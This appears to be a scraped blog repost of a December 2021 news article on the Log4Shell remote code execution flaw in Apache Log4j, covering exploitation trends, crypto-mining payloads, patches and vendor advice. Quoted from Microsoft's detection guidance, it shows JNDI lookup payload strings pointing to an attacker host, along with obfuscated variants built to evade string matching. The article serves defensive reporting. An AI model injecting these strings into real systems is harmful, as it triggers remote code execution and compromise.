{"id":44427,"date":"2021-12-14T15:24:59","date_gmt":"2021-12-14T15:24:59","guid":{"rendered":"https:\/\/packetstormsecurity.com\/news\/view\/32911\/The-Latest-On-The-Log4j-Remote-Code-Execution-Nightmare.html"},"modified":"2021-12-14T15:24:59","modified_gmt":"2021-12-14T15:24:59","slug":"the-latest-on-the-log4j-remote-code-execution-nightmare","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/the-latest-on-the-log4j-remote-code-execution-nightmare\/","title":{"rendered":"The Latest On The Log4j Remote Code Execution Nightmare"},"content":{"rendered":"<p>Miscreants are wasting no time in using the widespread Log4j vulnerability to compromise systems, with waves and waves of live exploit attempts focused mainly \u2013 for now \u2013 on turning infected devices into cryptocurrency-mining botnet drones.<\/p>\n<p>Check Point said this morning it was seeing around 100 exploit attempts every minute, going into further detail <a target=\"_blank\" href=\"https:\/\/blog.checkpoint.com\/2021\/12\/11\/protecting-against-cve-2021-44228-apache-log4j2-versions-2-14-1\/\" rel=\"noopener\">in a blog post<\/a>.<\/p>\n<p>Apache Log4j is an open-source logging library written in Java that is used all over the world in many software packages and online systems. Last week <a target=\"_blank\" href=\"https:\/\/www.theregister.com\/2021\/12\/10\/log4j_remote_code_execution_vuln_patch_issued\/\" rel=\"noopener\">it emerged<\/a> that Alibaba security engineer Chen Zhaojun had found and privately disclosed on November 24 details of a trivial-to-exploit remote code execution hole (<a target=\"_blank\" rel=\"nofollow noopener\" href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2021-44228\">CVE-2021-44228<\/a>) in Log4j 2.x, specifically versions 2.14.1 and earlier.<\/p>\n<div aria-hidden=\"true\" class=\"adun\" data-pos=\"top\" data-raptor=\"condor\" data-xsm=\",fluid,mpu,\" data-sm=\",fluid,mpu,\" data-md=\",fluid,mpu,\"> <noscript> <a href=\"https:\/\/pubads.g.doubleclick.net\/gampad\/jump?co=1&amp;iu=\/6978\/reg_security\/front&amp;sz=300x50%7C300x100%7C300x250%7C300x251%7C300x252%7C300x600%7C300x601&amp;tile=2&amp;c=2YbkW913@dOpDhTAYvphm3wAAAMo&amp;t=ct%3Dns%26unitnum%3D2%26raptor%3Dcondor%26pos%3Dtop%26test%3D0\" target=\"_blank\" rel=\"noopener\"> <img decoding=\"async\" src=\"https:\/\/pubads.g.doubleclick.net\/gampad\/ad?co=1&amp;iu=\/6978\/reg_security\/front&amp;sz=300x50%7C300x100%7C300x250%7C300x251%7C300x252%7C300x600%7C300x601&amp;tile=2&amp;c=2YbkW913@dOpDhTAYvphm3wAAAMo&amp;t=ct%3Dns%26unitnum%3D2%26raptor%3Dcondor%26pos%3Dtop%26test%3D0\" alt> <\/a> <\/noscript> <\/div>\n<p>Exploitation is possible by feeding a specially crafted snippet of text, such as a message or username, to an application that logs this information using Log4j 2. If the text contains a particular sequence of characters, the logging utility will end up fetching Java code from an attacker-controlled server and executing it, allowing the machine to be remotely hijacked and controlled. It is easily wormable, and is present in all manner of things, from Steam and Minecraft to spacecraft and Apple&#8217;s iCloud.<\/p>\n<div aria-hidden=\"true\" class=\"adun\" data-pos=\"top\" data-raptor=\"falcon\" data-xmd=\",fluid,mpu,leaderboard,\" data-lg=\",fluid,mpu,leaderboard,\" data-xlg=\",fluid,billboard,superleaderboard,mpu,leaderboard,\" data-xxlg=\",fluid,billboard,superleaderboard,brandwidth,brandimpact,leaderboard,mpu,\"> <noscript> <a href=\"https:\/\/pubads.g.doubleclick.net\/gampad\/jump?co=1&amp;iu=\/6978\/reg_security\/front&amp;sz=300x50%7C300x100%7C300x250%7C300x251%7C300x252%7C300x600%7C300x601&amp;tile=4&amp;c=44YbkW913@dOpDhTAYvphm3wAAAMo&amp;t=ct%3Dns%26unitnum%3D4%26raptor%3Dfalcon%26pos%3Dmid%26test%3D0\" target=\"_blank\" rel=\"noopener\"> <img decoding=\"async\" src=\"https:\/\/pubads.g.doubleclick.net\/gampad\/ad?co=1&amp;iu=\/6978\/reg_security\/front&amp;sz=300x50%7C300x100%7C300x250%7C300x251%7C300x252%7C300x600%7C300x601&amp;tile=4&amp;c=44YbkW913@dOpDhTAYvphm3wAAAMo&amp;t=ct%3Dns%26unitnum%3D426raptor%3Dfalcon%26pos%3Dmid%26test%3D0\" alt> <\/a> <\/noscript> <\/div>\n<div class=\"adun_eagle_desktop_story_wrapper\">\n<div aria-hidden=\"true\" class=\"adun\" data-pos=\"mid\" data-raptor=\"eagle\" data-xxlg=\",mpu,dmpu,\"> <noscript> <a href=\"https:\/\/pubads.g.doubleclick.net\/gampad\/jump?co=1&amp;iu=\/6978\/reg_security\/front&amp;sz=300x50%7C300x100%7C300x250%7C300x251%7C300x252%7C300x600%7C300x601&amp;tile=3&amp;c=33YbkW913@dOpDhTAYvphm3wAAAMo&amp;t=ct%3Dns%26unitnum%3D3%26raptor%3Deagle%26pos%3Dmid%26test%3D0\" target=\"_blank\" rel=\"noopener\"> <img decoding=\"async\" src=\"https:\/\/pubads.g.doubleclick.net\/gampad\/ad?co=1&amp;iu=\/6978\/reg_security\/front&amp;sz=300x50%7C300x100%7C300x250%7C300x251%7C300x252%7C300x600%7C300x601&amp;tile=3&amp;c=33YbkW913@dOpDhTAYvphm3wAAAMo&amp;t=ct%3Dns%26unitnum%3D3%26raptor%3Deagle%26pos%3Dmid%26test%3D0\" alt> <\/a> <\/noscript> <\/div>\n<\/p><\/div>\n<p>If you can imagine systems logging site search queries, browser user-agent strings, failed login attempts, and other visitor and customer-supplied stuff, and that this text can be weaponized to achieve code execution in the backend, you can appreciate how attractive this hole is for crooks and fraudsters. The vulnerability has been generally dubbed <a target=\"_blank\" rel=\"nofollow noopener\" href=\"https:\/\/www.lunasec.io\/docs\/blog\/log4j-zero-day\/\">Log4Shell<\/a>.<\/p>\n<p>On December 9, in response to Zhaojun&#8217;s findings, version 2.15 of Log4j was <a target=\"_blank\" rel=\"nofollow noopener\" href=\"https:\/\/logging.apache.org\/log4j\/2.x\/security.html\">released<\/a> with part of the exploitable functionality disabled by default. This should be installed as a priority, or one of the mitigations considered if you can&#8217;t update right now.<\/p>\n<div aria-hidden=\"true\" class=\"adun\" data-pos=\"top\" data-raptor=\"falcon\" data-xsm=\",fluid,mpu,\" data-sm=\",fluid,mpu,\" data-md=\",fluid,mpu,\"> <noscript> <a href=\"https:\/\/pubads.g.doubleclick.net\/gampad\/jump?co=1&amp;iu=\/6978\/reg_security\/front&amp;sz=300x50%7C300x100%7C300x250%7C300x251%7C300x252%7C300x600%7C300x601&amp;tile=4&amp;c=44YbkW913@dOpDhTAYvphm3wAAAMo&amp;t=ct%3Dns%26unitnum%3D4%26raptor%3Dfalcon%26pos%3Dmid%26test%3D0\" target=\"_blank\" rel=\"noopener\"> <img decoding=\"async\" src=\"https:\/\/pubads.g.doubleclick.net\/gampad\/ad?co=1&amp;iu=\/6978\/reg_security\/front&amp;sz=300x50%7C300x100%7C300x250%7C300x251%7C300x252%7C300x600%7C300x601&amp;tile=4&amp;c=44YbkW913@dOpDhTAYvphm3wAAAMo&amp;t=ct%3Dns%26unitnum%3D426raptor%3Dfalcon%26pos%3Dmid%26test%3D0\" alt> <\/a> <\/noscript> <\/div>\n<p>Proof-of-concept code to abuse the insecure logging library also spread across the web. This makes this whole situation dangerous because the code is so prevalent, it is easy to exploit, and there is plenty of working <a target=\"_blank\" rel=\"nofollow noopener\" href=\"https:\/\/github.com\/tangxiaofeng7\/CVE-2021-44228-Apache-Log4j-Rce\">example attack code<\/a> out there while many systems remain unpatched. The flaw is rated 10 out of 10 in terms of severity.<\/p>\n<p>System admins as well as developers may be tempted to use one of the available proof-of-concept exploits to see if their applications, and their numerous dependencies, use the logging library and are therefore vulnerable to the flaw \u2013 and that&#8217;s not a terrible idea at all. However, bear in mind that it&#8217;s quite possible those exploiting services out in the wild are also patching Log4j after the initial compromise to keep other miscreants out. Thus, you should consider auditing your code, and installing updates from vendors, as well as look for indicators of compromise and signs that the software has been patched by an intruder.<\/p>\n<div class=\"boxout\">\n<h3 class=\"crosshead\"><span>Useful links<\/span><\/h3>\n<ul>\n<li>A <a target=\"_blank\" rel=\"nofollow noopener\" href=\"https:\/\/www.cygenta.co.uk\/post\/log4shell-in-simple-terms\">gentle explanation<\/a> of the Log4j bug by Cygenta<\/li>\n<li>A more <a target=\"_blank\" rel=\"nofollow noopener\" href=\"https:\/\/blog.shiftleft.io\/log4shell-jndi-injection-via-attackable-log4j-6bfea2b4896e\">technical breakdown<\/a> by ShiftLeft<\/li>\n<li>Cybereason <a target=\"_blank\" rel=\"nofollow noopener\" href=\"https:\/\/github.com\/Cybereason\/Logout4Shell\">released<\/a> what it called a vaccine that exploits the flaw to disable the bugged functionality in Log4j<\/li>\n<li>Here&#8217;s a <a target=\"_blank\" rel=\"nofollow noopener\" href=\"https:\/\/github.com\/curated-intel\/Log4Shell-IOCs\">curated list<\/a> of known indicators-of-compromise<\/li>\n<li>And a <a target=\"_blank\" rel=\"nofollow noopener\" href=\"https:\/\/gist.github.com\/SwitHak\/b66db3a06c2955a9cb71a8718970c592\">big list of vendors<\/a> shipping patches because their products include Log4j 2.x. Don&#8217;t forget: application and server software that include the logging tool need to be distributed to users and installed<\/li>\n<li>Cloudflare CEO Matthew Prince <a target=\"_blank\" rel=\"nofollow noopener\" href=\"https:\/\/twitter.com\/eastdakota\/status\/1469800951351427073\">said<\/a> his biz discovered Log4j exploit attempts happening as early as December 1, and Cisco <a target=\"_blank\" rel=\"nofollow noopener\" href=\"https:\/\/blog.talosintelligence.com\/2021\/12\/apache-log4j-rce-vulnerability.html\">said<\/a> it saw attempts the next day<\/li>\n<\/ul>\n<\/div>\n<p>For now, the infosec industry is mainly sounding the alarm and telling the world that a Very Bad Thing has come to light \u2013 with many taking the opportunity to push their own security defense products, we couldn&#8217;t help but note. So far, the vuln is seemingly mostly being used to install crypto-mining bots on servers amid scans for at-risk devices, though it&#8217;s early days yet.<\/p>\n<p>Bitdefender said its honeypot network had seen an increase in scans from &#8220;Russia-based IP addresses,&#8221; which as a bare fact on its own means little; anyone can route their web traffic through a Russia-based node, with some occasionally <a target=\"_blank\" href=\"https:\/\/www.theregister.com\/2019\/12\/05\/fooling_attribution_breadcrumbs\/\" rel=\"noopener\">doing so<\/a> for fun and profit.<\/p>\n<p>Sophos warned that cryptocoin-mining botnets are one of the more popular post-exploit payloads it&#8217;s seeing as a result of successful Log4j compromises. The firm said in a <a target=\"_blank\" rel=\"nofollow noopener\" href=\"https:\/\/news.sophos.com\/en-us\/2021\/12\/12\/log4shell-hell-anatomy-of-an-exploit-outbreak\/\">blog post<\/a> that botnets &#8220;focus on Linux server platforms, which are particularly exposed to this vulnerability.&#8221;<\/p>\n<p>&#8220;Log4j is a library that is used by many products,&#8221; said Sophos senior threat researcher Sean Gallagher. &#8220;It can therefore be present in the darkest corners of an organization\u2019s infrastructure. For example: any software developed in-house. Finding all systems that are vulnerable to Log4Shell should be a priority for IT security.&#8221;<\/p>\n<p>Sophos also warned of Log4j-related attempts to steal AWS private keys. For its part, Amazon Web Services&#8217; security arm <a target=\"_blank\" rel=\"nofollow noopener\" href=\"https:\/\/aws.amazon.com\/blogs\/opensource\/hotpatch-for-apache-log4j\/\">published<\/a> what it says is a hotpatching utility for Log4j.<\/p>\n<div aria-hidden=\"true\" class=\"adun\" id=\"story_eagle_xsm_sm_md_xmd_lg_xlg\" data-pos=\"mid\" data-raptor=\"eagle\" data-xsm=\",mpu,dmpu,\" data-sm=\",mpu,dmpu,\" data-md=\",mpu,dmpu,\" data-xmd=\",mpu,dmpu,\" data-lg=\",mpu,dmpu,\" data-xlg=\",mpu,dmpu,\"> <noscript> <a href=\"https:\/\/pubads.g.doubleclick.net\/gampad\/jump?co=1&amp;iu=\/6978\/reg_security\/front&amp;sz=300x50%7C300x100%7C300x250%7C300x251%7C300x252%7C300x600%7C300x601&amp;tile=3&amp;c=33YbkW913@dOpDhTAYvphm3wAAAMo&amp;t=ct%3Dns%26unitnum%3D3%26raptor%3Deagle%26pos%3Dmid%26test%3D0\" target=\"_blank\" rel=\"noopener\"> <img decoding=\"async\" src=\"https:\/\/pubads.g.doubleclick.net\/gampad\/ad?co=1&amp;iu=\/6978\/reg_security\/front&amp;sz=300x50%7C300x100%7C300x250%7C300x251%7C300x252%7C300x600%7C300x601&amp;tile=3&amp;c=33YbkW913@dOpDhTAYvphm3wAAAMo&amp;t=ct%3Dns%26unitnum%3D3%26raptor%3Deagle%26pos%3Dmid%26test%3D0\" alt> <\/a> <\/noscript> <\/div>\n<p>Various infosec companies have started live blogs or rapidly updated posts with mitigation information, including Randori (one of the first Western companies to publish detailed <a target=\"_blank\" href=\"https:\/\/www.randori.com\/blog\/cve-2021-44228\/\" rel=\"noopener\">information<\/a> about the remote code execution hole) as well as Trend Micro and others.<\/p>\n<p>Microsoft published its own Log4j exploitation <a target=\"_blank\" rel=\"nofollow noopener\" href=\"https:\/\/www.microsoft.com\/security\/blog\/2021\/12\/11\/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation\/\">prevention advice<\/a>, saying it has mostly seen &#8220;mass scanning by attackers attempting to thumbprint vulnerable systems, as well as scanning by security companies and researchers.&#8221;<\/p>\n<p>Redmond said: &#8220;An example pattern of attack would appear in a web request log with strings like the following:&#8221;<\/p>\n<pre class=\"wrap_text\">${jndi:ldap:\/\/[attacker site]\/a}\n<\/pre>\n<p>&#8220;We\u2019ve seen things like running a lower or upper command within the exploitation string ({jndi:${lower:l}${lower:d}a${lower:p}) and even more complicated obfuscation attempts (${${::-j}${::-n}${::-d}${::-i}) that are all trying to bypass string-matching detections,&#8221; the Windows giant added.<\/p>\n<p>Like with previous big scary bugs, Log4Shell has a website, a hastily drawn logo, tons of headlines, and probably a three-book publication deal and a movie. Probably. Does it deserve all this excitement? Well, that depends on how fast you patch. \u00ae<\/p>\n<h3 class=\"crosshead\"> <span>Bootnote<\/span><br \/>\n<\/h3>\n<p>F-Secure&#8217;s CISO Erka Koivunen echoed all the usual warnings, adding: &#8220;Please don\u2019t change your Tesla or iPhone name into ${jndi:ldap:\/\/url\/a} unless you want unexpected user experience.&#8221;<\/p>\n<p>That would be a terrible thing to do. Really upsetting. So don&#8217;t do it. No, please, don&#8217;t.<\/p>\n<p> READ MORE <a href=\"https:\/\/packetstormsecurity.com\/news\/view\/32911\/The-Latest-On-The-Log4j-Remote-Code-Execution-Nightmare.html\">HERE<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>READ MORE HERE&#8230;<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_layout":"default_layout","footnotes":""},"categories":[60],"tags":[9778],"class_list":["post-44427","post","type-post","status-publish","format-standard","hentry","category-packet-storm","tag-headlinehackerdata-lossflawjavaapache"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.8 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>The Latest On The Log4j Remote Code Execution Nightmare 2026 | ThreatsHub Cybersecurity News<\/title>\n<meta name=\"description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.threatshub.org\/blog\/the-latest-on-the-log4j-remote-code-execution-nightmare\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"The Latest On The Log4j Remote Code Execution Nightmare 2026 | ThreatsHub Cybersecurity News\" \/>\n<meta property=\"og:description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.threatshub.org\/blog\/the-latest-on-the-log4j-remote-code-execution-nightmare\/\" \/>\n<meta property=\"og:site_name\" content=\"ThreatsHub Cybersecurity News\" \/>\n<meta property=\"article:published_time\" content=\"2021-12-14T15:24:59+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/pubads.g.doubleclick.net\/gampad\/ad?co=1&amp;iu=\/6978\/reg_security\/front&amp;sz=300x50%7C300x100%7C300x250%7C300x251%7C300x252%7C300x600%7C300x601&amp;tile=2&amp;c=2YbkW913@dOpDhTAYvphm3wAAAMo&amp;t=ct%3Dns%26unitnum%3D2%26raptor%3Dcondor%26pos%3Dtop%26test%3D0\" \/>\n<meta name=\"author\" content=\"TH Author\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@threatshub\" \/>\n<meta name=\"twitter:site\" content=\"@threatshub\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"TH Author\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/the-latest-on-the-log4j-remote-code-execution-nightmare\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/the-latest-on-the-log4j-remote-code-execution-nightmare\\\/\"},\"author\":{\"name\":\"TH Author\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\"},\"headline\":\"The Latest On The Log4j Remote Code Execution Nightmare\",\"datePublished\":\"2021-12-14T15:24:59+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/the-latest-on-the-log4j-remote-code-execution-nightmare\\\/\"},\"wordCount\":1048,\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/the-latest-on-the-log4j-remote-code-execution-nightmare\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/pubads.g.doubleclick.net\\\/gampad\\\/ad?co=1&amp;iu=\\\/6978\\\/reg_security\\\/front&amp;sz=300x50%7C300x100%7C300x250%7C300x251%7C300x252%7C300x600%7C300x601&amp;tile=2&amp;c=2YbkW913@dOpDhTAYvphm3wAAAMo&amp;t=ct%3Dns%26unitnum%3D2%26raptor%3Dcondor%26pos%3Dtop%26test%3D0\",\"keywords\":[\"headline,hacker,data loss,flaw,java,apache\"],\"articleSection\":[\"Packet Storm\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/the-latest-on-the-log4j-remote-code-execution-nightmare\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/the-latest-on-the-log4j-remote-code-execution-nightmare\\\/\",\"name\":\"The Latest On The Log4j Remote Code Execution Nightmare 2026 | ThreatsHub Cybersecurity News\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/the-latest-on-the-log4j-remote-code-execution-nightmare\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/the-latest-on-the-log4j-remote-code-execution-nightmare\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/pubads.g.doubleclick.net\\\/gampad\\\/ad?co=1&amp;iu=\\\/6978\\\/reg_security\\\/front&amp;sz=300x50%7C300x100%7C300x250%7C300x251%7C300x252%7C300x600%7C300x601&amp;tile=2&amp;c=2YbkW913@dOpDhTAYvphm3wAAAMo&amp;t=ct%3Dns%26unitnum%3D2%26raptor%3Dcondor%26pos%3Dtop%26test%3D0\",\"datePublished\":\"2021-12-14T15:24:59+00:00\",\"description\":\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/the-latest-on-the-log4j-remote-code-execution-nightmare\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/the-latest-on-the-log4j-remote-code-execution-nightmare\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/the-latest-on-the-log4j-remote-code-execution-nightmare\\\/#primaryimage\",\"url\":\"https:\\\/\\\/pubads.g.doubleclick.net\\\/gampad\\\/ad?co=1&amp;iu=\\\/6978\\\/reg_security\\\/front&amp;sz=300x50%7C300x100%7C300x250%7C300x251%7C300x252%7C300x600%7C300x601&amp;tile=2&amp;c=2YbkW913@dOpDhTAYvphm3wAAAMo&amp;t=ct%3Dns%26unitnum%3D2%26raptor%3Dcondor%26pos%3Dtop%26test%3D0\",\"contentUrl\":\"https:\\\/\\\/pubads.g.doubleclick.net\\\/gampad\\\/ad?co=1&amp;iu=\\\/6978\\\/reg_security\\\/front&amp;sz=300x50%7C300x100%7C300x250%7C300x251%7C300x252%7C300x600%7C300x601&amp;tile=2&amp;c=2YbkW913@dOpDhTAYvphm3wAAAMo&amp;t=ct%3Dns%26unitnum%3D2%26raptor%3Dcondor%26pos%3Dtop%26test%3D0\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/the-latest-on-the-log4j-remote-code-execution-nightmare\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"headline,hacker,data loss,flaw,java,apache\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/tag\\\/headlinehackerdata-lossflawjavaapache\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"The Latest On The Log4j Remote Code Execution Nightmare\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"name\":\"ThreatsHub Cybersecurity News\",\"description\":\"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"alternateName\":\"Threatshub.org\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\",\"name\":\"ThreatsHub.org\",\"alternateName\":\"Threatshub.org\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"width\":432,\"height\":435,\"caption\":\"ThreatsHub.org\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/x.com\\\/threatshub\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\",\"name\":\"TH Author\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"caption\":\"TH Author\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"The Latest On The Log4j Remote Code Execution Nightmare 2026 | ThreatsHub Cybersecurity News","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.threatshub.org\/blog\/the-latest-on-the-log4j-remote-code-execution-nightmare\/","og_locale":"en_US","og_type":"article","og_title":"The Latest On The Log4j Remote Code Execution Nightmare 2026 | ThreatsHub Cybersecurity News","og_description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","og_url":"https:\/\/www.threatshub.org\/blog\/the-latest-on-the-log4j-remote-code-execution-nightmare\/","og_site_name":"ThreatsHub Cybersecurity News","article_published_time":"2021-12-14T15:24:59+00:00","og_image":[{"url":"https:\/\/pubads.g.doubleclick.net\/gampad\/ad?co=1&amp;iu=\/6978\/reg_security\/front&amp;sz=300x50%7C300x100%7C300x250%7C300x251%7C300x252%7C300x600%7C300x601&amp;tile=2&amp;c=2YbkW913@dOpDhTAYvphm3wAAAMo&amp;t=ct%3Dns%26unitnum%3D2%26raptor%3Dcondor%26pos%3Dtop%26test%3D0","type":"","width":"","height":""}],"author":"TH Author","twitter_card":"summary_large_image","twitter_creator":"@threatshub","twitter_site":"@threatshub","twitter_misc":{"Written by":"TH Author","Est. reading time":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.threatshub.org\/blog\/the-latest-on-the-log4j-remote-code-execution-nightmare\/#article","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/the-latest-on-the-log4j-remote-code-execution-nightmare\/"},"author":{"name":"TH Author","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476"},"headline":"The Latest On The Log4j Remote Code Execution Nightmare","datePublished":"2021-12-14T15:24:59+00:00","mainEntityOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/the-latest-on-the-log4j-remote-code-execution-nightmare\/"},"wordCount":1048,"publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/the-latest-on-the-log4j-remote-code-execution-nightmare\/#primaryimage"},"thumbnailUrl":"https:\/\/pubads.g.doubleclick.net\/gampad\/ad?co=1&amp;iu=\/6978\/reg_security\/front&amp;sz=300x50%7C300x100%7C300x250%7C300x251%7C300x252%7C300x600%7C300x601&amp;tile=2&amp;c=2YbkW913@dOpDhTAYvphm3wAAAMo&amp;t=ct%3Dns%26unitnum%3D2%26raptor%3Dcondor%26pos%3Dtop%26test%3D0","keywords":["headline,hacker,data loss,flaw,java,apache"],"articleSection":["Packet Storm"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.threatshub.org\/blog\/the-latest-on-the-log4j-remote-code-execution-nightmare\/","url":"https:\/\/www.threatshub.org\/blog\/the-latest-on-the-log4j-remote-code-execution-nightmare\/","name":"The Latest On The Log4j Remote Code Execution Nightmare 2026 | ThreatsHub Cybersecurity 